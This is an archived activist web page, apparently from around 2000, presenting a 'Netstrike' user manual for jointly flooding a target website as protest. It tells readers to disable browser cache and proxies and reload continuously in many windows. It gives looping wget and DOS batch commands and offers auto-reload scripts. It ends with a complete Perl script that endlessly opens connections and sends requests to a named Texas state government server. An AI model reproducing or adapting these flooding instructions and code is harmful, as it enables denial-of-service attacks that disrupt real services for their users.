Cyber Rights Now!!! Netstrike - Web Protest for the Masses! Cyber Rights Now!!!


Netstrike - User Manual
How can I partecipate?

[The phases are in order of rising difficulty, but don't get afraid: **************** ;-)]
The only real necessary things to partecipate a netstrike are contained in the first two sections of this page, they are about the fun of the irc gatherings while the protest is in act, and the minimal informations needed to do your part. The rest is just surplus for who want to really got hype ;-)

Coordination and Communication Section
  • If you have a preferred irc client, set as server www.ecn.org and as channel #hackit99, and follow online the evolution of the netstrike!
  • If you are not familiar with irc clients, connect to chat on Isole nella Rete, and be sure to use a java enabled browser.
  • If both the last two points fail, you can follow the netstrike in real time on the mailing list published at Cyber Rights
Smart Browsing Section
  • Start your preferred Browser [we think this point don't need further explanations ;-]
  • Don't set any proxyfor your connection
    Warning Maybe your office's proxy is your only way of access to the web, in this case try to gain access to a machine with a direct connection, if this is not possible your partecipation will be limited by the setting of your proxy, which are usually quite restictive :(
    • Internet Exploder
      1. Menu Visualizza
      2. Sezione Opzioni Internet
      3. Sottosezione Connessione
      4. Lasciate vuoto lo spazio in corrispondenza della voce Accedi a Internet tramite un Server Proxy
    • Netscape Navigator 3.x
      1. Menu Options
      2. Section Network Preferences
      3. Subsection Proxies
      4. Set the voice No Proxies
    • Netscape Navigator 4.x e seguenti
      1. Menu Edit
      2. Section Preferences
      3. Subsection Advanced -> Proxies
      4. Set the voice Direct connection on Internet
    • Opera
      1. Menu File
      2. Section Preferences
      3. Subsection Connections
      4. Disable the voice Proxy Servers
  • Set to 0 the cache of your browser
    • Internet Exploder - version 1
      1. Menu Visualize
      2. Sezione Internet Options
      3. Subsection General
      4. Internet Temporary Files -> Settings
      5. Set the research of a most recent version of the pages:
        at the page opening
      6. Bring to 0 the The space used by Temporary Internet Files
    • Internet Exploder - version 2
      1. Download disabilita.reg
      2. Double click on it
      3. To restore the original settings download riabilita.reg and do the same thing
    • Netscape Navigator 3.x
      1. Menu Options
      2. Section Network Preferences
      3. Subsection Cache
      4. Set the voice Verify Documents su Every time
      5. Set to 0 both the Memory Cache and the Disk Cache and click on Clear Memory Cache e Clear Disk Cache buttons
    • Netscape Navigator 4.x e seguenti
      1. Menu Edit
      2. Section Preferences
      3. Subsection Advanced -> Cache
      4. Set "Compare the page in the cache with the page on the network
        Every Time I view the page
      5. Set to 0 both the Memory Cache and the Disk Cache and click on Clear Memory Cache e Clear Disk Cache buttons
    • Opera
      1. Menu File
      2. Section Preferences
      3. Subsection HIstory and Cache
      4. Voice Check Modified
      5. Set all the parts of this voice always
      6. Set to 0 the voice Disk Cache
      7. Click on button Empty Now
  • Now insert the target web address in your navigation bar
  • Keep clicking Reload continuosly
    If you want to be REALLY sure to reload your page every time keep pushing the key Shift while you are reloading the page.
  • The last two operations can be executed on several browser windows at the same time, maximizing your firepower ;-))
    [To open another windows: Menu File -> Section New -> Subsession Window]
    Or, if possible, is even better to engage to operations described in this section with several different browsers(eg: Netscape and Exploder)

Bandwidth Section
  • Are you familiar with software aimed to download entire websites?
    If the answer is no you can download Teleport Pro o wget two programs that permito to download several different pages of the target site, optimizin your contribute to the netstrike.
    • Teleport
      1. Menu File
      2. New Project Wizard
      3. Follow thw wizard indications and fill the fields tha are needed:
        • Create a duplicate of the site on my hard disk
        • The targert of the netstrike as starting address
        • Download both text and graphic
      4. Go in the Starting address field on the left window and click right mouse button
      5. Section Starting address proprieties
      6. Set Exploration limits depth on To 10 links from starting address
    • wget
      1. You must digits
        wget -m --cache=off --delete-after -r -t0 -np --proxy=off Indirizzo interessato dal Netstrike
    • If you are using the dos version wget per dos (not windows):
        lauch nimefile.bat and wait.......
      • @echo off
      • echo.
      • echo.
      • echo NETSTRIKE!!!!
      • echo.
      • echo.
      • wget Target Address -r
      • -nH -m --user-agent=Netstrike_Crew
      • --delete-after
      • echo.
      • echo.
      • choice /t:s,5 Vuoi continuare a sostenere il Netstrike?
      • call nomefile.bat
    • If you are using wget under UNIX
      we have brought to you the option --netstrike
ProgPop Section (o People Programming)
  • Loa Netstrike: funny nasty javascripts bron from the mental hillness applied to graphics, produced here at LOA aimed to reload every 20 seconds the home page of the city of Milan;
    you need to flat to zero the cache of course
    We reccomend to open it in several windows to maximize your partecipation at Netstrike
  • disabilita.reg:Registry file that disable the Internet exploder cache;
    save it on your desktop and double-click on it;
    To restore the original setting we also have produced riabilita.reg, even this must be saved on desktop, double-click on it.
  • contributo di un amico hacaro alla causa: Another serverside script that automatically reload the target pages;
    like alway you need to put to zero the cache
    Suggested the opening of several windows at the same time
  • Jcounter by SpzkWebCrew:
    reload of a page every 10 seconds
    Intructions
    1. Set parameters in the counter.html file (address and delay)
    2. Load the page jcounter.html
    3. It do the rest...
    As always setting cache to zero and multiple loads of the page jcounter.html are suggested
  • Arachne: Sorry if we have put it here but it's not part of the other categories
    1. digit the address of the target of the Netstrike
    2. digit "q"
    3. wait
    4. F8
    5. repeat
Programming Section
  • write procedures with whaterver language you want (perl, html, php, javascript, java, C, C++, the virginmary know what other ;-)) aimed to the continuosly reload of the target pages
  • Another hacking contribute, this time his author is catalan. :) The code is quite simple and make *nasty requestes* at two URLs predefined (It was for the Netstrike against Death penality done 30 november 2000)... copy (or scaricatevi) the file and execute it with Perl, it does even 20 connections in a minute with a 56K..
    #!/usr/bin/perl
    
    ##	Netstrike contra la "Pena di morti".
    
    ##
    
    ##	Simple-Auto-Netstrike v 0.1
    
    ##	
    
    ##	kenneth@drac.com	
    
    ##
    
    
    
    use IO::Socket;
    
    
    
    $host="tdcj.state.tx.us";
    
    $start_query="Contra+%2Bla+%26pena+-cde+%26mort+i+altres+menes+de+matar+persones,
    +acabem+amb+els+estats+i+les+lleis+feixistes,+opressores+o+discriminatòries.";
    
    
    
    	$LINK[0]="/cgi-bin/Stop_Killing_People";
    
    	$start_link="/cgi-bin/texis/webinator/search/?db=db&query=";
    
    	$query=$start_query;
    
    	$end_link="&submit=Submit";
    
    
    
    	$i=0;
    	$j=0;
    for(;;)
    
    {
    
    	$i=$j%2;
    
    #	Here we get min-diff queries. I want the message to be readed :)
    
    #	Very simple. Excuese me but... I've modified it in 2 min!
    
    
    
    	if(($j%3)!=0)
    
    	{
    
    		$query=~ y/a-z/b-y/ ;
    
    		$LINK[1]=$start_link.$query.$end_link;		
    
    	}else{
    
    		$query=$j.$start_query.$j;
    
    		$LINK[1]=$start_link.$query.$end_link;
    
    	}
    
    
    
    	$sock = IO::Socket::INET->new(PeerAddr => $host,
    
    				PeerPort => 80,
    
    				Proto => 'tcp');
    
    	die "Socket $sock not connected: $!\n" unless $sock;
    
    	
    
    	$j++;
    
    #		print "$j\t-> GET $LINK[$i] HTTP/1.0\n";
    
    	printf "GET number: $j\n";
    
    	print $sock "GET $LINK[$i] HTTP/1.0\n\n";
    
    #	Here we read the socket :) long time ago, here was my spider's heart, 
    
    #	nowadays, its more useful for Netstrikes as we can see it now ;-)
    
    
    
    	while ($buf = <$sock>)
    
    	{
    
    	}
    
    	close ($sock);
    
    }




For more informations : info@netstrike.it







Isole nella Rete - autonomous zone!

site hosted by Isole nella Rete